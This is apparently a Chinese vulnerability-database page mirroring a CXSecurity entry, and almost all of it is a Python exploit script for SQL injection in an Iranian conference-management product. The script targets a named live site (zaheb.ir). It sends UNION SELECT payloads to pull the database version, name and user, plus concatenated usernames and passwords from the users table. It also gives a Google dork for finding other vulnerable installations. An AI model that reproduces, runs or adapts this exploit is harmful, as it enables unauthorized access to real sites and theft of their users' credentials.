Zaheb.ir | SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1705105 漏洞类型
发布时间 2019-08-17 更新时间 2019-08-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080063
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/python3
################################################
# Title: Zaheb.ir | SQL Injection
# Date: 2019-07-23                                     
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)                                     
# Exploit Author: D3trct0r
# Vendor Homepage: http://asanhamayesh.com     
# Tested on: GNU/Linux , Windows , FreeBsd , Android   
# CWE : CWE-89      
################################################


import requests
from bs4 import BeautifulSoup
try:
    print ('''\033[31m
        ███████╗ █████╗ ██╗  ██╗███████╗██████╗    ██╗██████╗ 
        ╚══███╔╝██╔══██╗██║  ██║██╔════╝██╔══██╗   ██║██╔══██╗
          ███╔╝ ███████║███████║█████╗  ██████╔╝   ██║██████╔╝
         ███╔╝  ██╔══██║██╔══██║██╔══╝  ██╔══██╗   ██║██╔══██╗
        ███████╗██║  ██║██║  ██║███████╗██████╔╝██╗██║██║  ██║
        ╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝╚═╝  ╚═╝
                                                      
        ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗ 
        ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝ 
        █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║    
        ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║    
        ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║    
        ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝    
                                                     
        Enter 'help' to show commands
    ''')
    while True:
        opt = input ("[root@Zaheb Exploit]# ")
        if opt == 'help' :
            print ('''
            version
            database
            userdb
            usernames
            passwords
            userpass
            exit
            ''')
        elif opt == 'version':

            payload = "+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'database':

            payload = "+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'userdb':
            payload = "+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'usernames':
            payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'passwords':
            payload = "+union+select+1,2,3,unhex(hex(group_concat(PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'userpass':
            payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName,0x3a,PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
            url = "http://zaheb.ir/Post.php?id=-917"
            up = (url+payload)
            r = requests.get(up)
            html = BeautifulSoup(r.content,'html.parser')
            data = html.find_all('div',attrs={'class':'post-short'})
            for i in data[0]:
                print('\033[31m ' ,i)
        elif opt == 'exit':
            quit()
        else:
            print ("EXP:",opt,"Command Not Found")
except SystemError:
    print ("Please Check Internet....")